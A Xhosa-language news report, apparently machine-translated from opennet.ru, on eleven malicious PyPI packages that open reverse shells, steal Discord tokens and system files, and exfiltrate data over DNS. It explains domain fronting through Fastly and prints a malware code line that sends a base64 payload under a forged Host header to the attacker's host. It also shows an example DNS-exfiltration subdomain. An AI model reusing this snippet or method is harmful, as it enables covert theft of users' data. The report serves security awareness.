Kwi-PyPI (i-Python Package Index), iipakethi ze-11 eziqulethe ikhowudi enobungozi zichongiwe. Phambi kokuba zichongwe iingxaki, iipakethe bezikhutshiwe malunga namawaka angama-38 ngamaxesha ewonke. Iiphakheji ezinobungozi ezifunyenweyo ziphawuleka ekusebenziseni kwazo iindlela eziphucukileyo zokufihla iziteshi zonxibelelwano kunye neeseva zabahlaseli.
- importantpackage (6305 ukhuphelo), ebalulekileyo-iphakheji (12897) - yaseka uxhulumaniso kumncedisi wangaphandle phantsi kwengubo yokuqhagamshela pypi.python.org ukubonelela iqokobhe ufikelelo kwinkqubo (iqokobhe reverse) kwaye wasebenzisa inkqubo trevorc2 ukufihla umjelo wonxibelelwano.
- pptest (10001), ipboards (946) - isetyenziswe i-DNS njengejelo lonxibelelwano ukuhambisa ulwazi malunga nenkqubo (kwipakethi yokuqala igama lomninimzi, ulawulo olusebenzayo, i-IP yangaphakathi nangaphandle, okwesibini - igama lomsebenzisi kunye negama lomninimzi) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - ichonge ithokheni yenkonzo yeDiscord kwinkqubo kwaye iyithumele kumamkeli wangaphandle.
- I-trrfab (287) - ithumele isazisi, igama lomninimzi kunye nemixholo ye /etc/passwd, /etc/hosts,/home to the external host.
- I-10Cent10 (490) - iseke uxhulumaniso lweqokobhe olubuyela umva kunye nomkhosi wangaphandle.
- yandex-yt (4183) - ibonise umyalezo malunga nenkqubo echithwayo kwaye iqondiswe kwakhona kwiphepha ngolwazi olongezelelweyo malunga nezenzo ezingaphezulu ezikhutshwe nge-nda.ya.ru (api.ya.cc).
Eyona nto ibalulekileyo yindlela yokufikelela kwimikhosi yangaphandle esetyenziswe kwi-package ebalulekileyo kunye neepakethe ezibalulekileyo, ezisetyenziselwa inethiwekhi yokuhanjiswa komxholo ngokukhawuleza esetyenziswe kwi-PyPI directory ukufihla umsebenzi wabo. Enyanisweni, izicelo zithunyelwe kwi-pypi.python.org iseva (kubandakanywa nokuchaza igama elithi python.org kwi-SNI ngaphakathi kwesicelo se-HTTPS), kodwa i-HTTP "I-Host" i-header iquka igama lomncedisi olawulwa ngabahlaseli (i-sec. phambili.io. global.prod.fastly.net). Inethiwekhi yokuhanjiswa komxholo ithumele isicelo esifanayo kwiseva ehlaselayo, isebenzisa iiparitha zoqhagamshelo lwe-TLS kwi-pypi.python.org xa uhambisa idatha.
Isiseko sePyPI sisebenza ngenethiwekhi yokuhanjiswa komxholo weFastly, esebenzisa iproksi yeVarnish ebonakalayo ukugcina izicelo eziqhelekileyo kwaye iphatha izatifikethi zeTLS kwinqanaba le-CDN, endaweni yeeseva zesiphelo, ukuhambisa izicelo ze-HTTPS ngeproksi. Nokuba yeyiphi na ihost ekujoliswe kuyo, izicelo zithunyelwa kwiproksi, emisela ihost oyifunayo kusetyenziswa i-"Host" HTTP header. amagama eedomeyini Iihost zidweliswe kwiidilesi ze-IP ze-CDN load balancer eziqhelekileyo kubo bonke abathengi be-Fastly.
Iseva yomhlaseli ikwabhalisa kwi-Fastly CDN, enika izicwangciso zasimahla kuye nabani na kwaye ivumela nokubhaliswa okungaziwayo. Okuphawulekayo kukuba, igobolondo elibuyela umva likwasetyenziselwa ukuthumela izicelo kwixhoba, kodwa liqalwa ngumninimzi womhlaseli. Ukusuka ngaphandle, ukusebenzisana neseva yomhlaseli kubonakala ngathi ziiseshoni ezisemthethweni kunye nolawulo lwe-PyPI, olufihliweyo kusetyenziswa Isatifikethi se-TLS I-PyPI. Indlela efanayo, eyaziwa ngokuba yi-"domain fronting," yayisetyenziswa kakhulu ngaphambili ukufihla amagama ee-hostname xa kudlulwa ukuvimba. Le ndlela isebenzisa uphawu lokufikelela lwe-HTTPS olunikezelwa ngamanye ama-CDN, ichaza igama lee-hostname elingeyonyani kwi-SNI kwaye idlulise igama lee-hostname eliceliweyo kwi-header ye-HTTP Host ngaphakathi kweseshoni ye-TLS.
Ukufihla umsebenzi okhohlakeleyo, iphakheji ye-TrevorC2 iye yasetyenziselwa ukwenza unxibelelwano kunye neseva ngokufana nokukhangela rhoqo kwiwebhu, umzekelo, izicelo ezinobungozi zathunyelwa phantsi komfanekiso wokukhuphela umfanekiso "https://pypi.python.org/images/ guide=” ngolwazi olufakwe kwiparamitha yesikhokhelo. url = "https://pypi.python.org" + "/imifanekiso" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
I-pptest kunye neepakethe ze-ipboards zisebenzise indlela eyahlukileyo yokufihla umsebenzi womnatha, ngokusekelwe kwi-encoding yolwazi oluluncedo kwimibuzo kwiseva ye-DNS. I-malware idlulisela ulwazi ngokwenza izicelo ze-DNS ezifana ne "nu4timjagq4fimbuhe.example.com", apho idatha edluliselwe kwi-server yokulawula ifakwe ngekhowudi isebenzisa i-base64 ifomathi kwigama le-subdomain. Umhlaseli ufumana le miyalezo ngokulawula iseva ye-DNS yesizinda somzekelo.com.
umthombo: opennet.ru
